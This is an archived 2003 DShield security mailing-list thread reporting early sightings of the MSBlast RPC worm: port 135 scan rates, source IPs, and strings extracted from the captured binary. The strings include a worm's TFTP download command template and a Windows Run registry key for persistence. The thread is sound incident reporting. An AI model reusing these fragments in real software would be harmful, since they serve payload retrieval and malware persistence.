[Dshield] infocon: yellow

Korhonen Juuso juuso.korhonen at camline.fi
Mon Aug 11 19:23:03 GMT 2003


Confirmed from Finland also. Getting hits to 135 with rate 5/sec. Also
seeing huge increase to 137.



Best Regards

Juuso

Radiant, sir, radiant 




-----Original Message-----
From: Richard Golodner [mailto:RGolodner at Aetea.com]
Sent: 11. elokuuta 2003 22:04
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow


We are seeing a 10x increase in scans for port 135 begining at 1400 Eastern
Time.
Top Four Netblocks
61.43.222.214
65.30.70.92
198.142.176.27
212.27.213.168
			Richard

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Monday, August 11, 2003 2:44 PM
To: General DShield Discussion List
Subject: RE: [Dshield] infocon: yellow


Looks like it's starting, I'm getting blasted with them.

-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Monday, August 11, 2003 2:24 PM
To: list at dshield.org
Subject: [Dshield] infocon: yellow


This message was converted from multipart/signed to ascii armored
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----

--
SHA1
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
****************************************************************************
This message has been scanned by F-Secure Anti-Virus for Microsoft Exchange.
****************************************************************************




More information about the list mailing list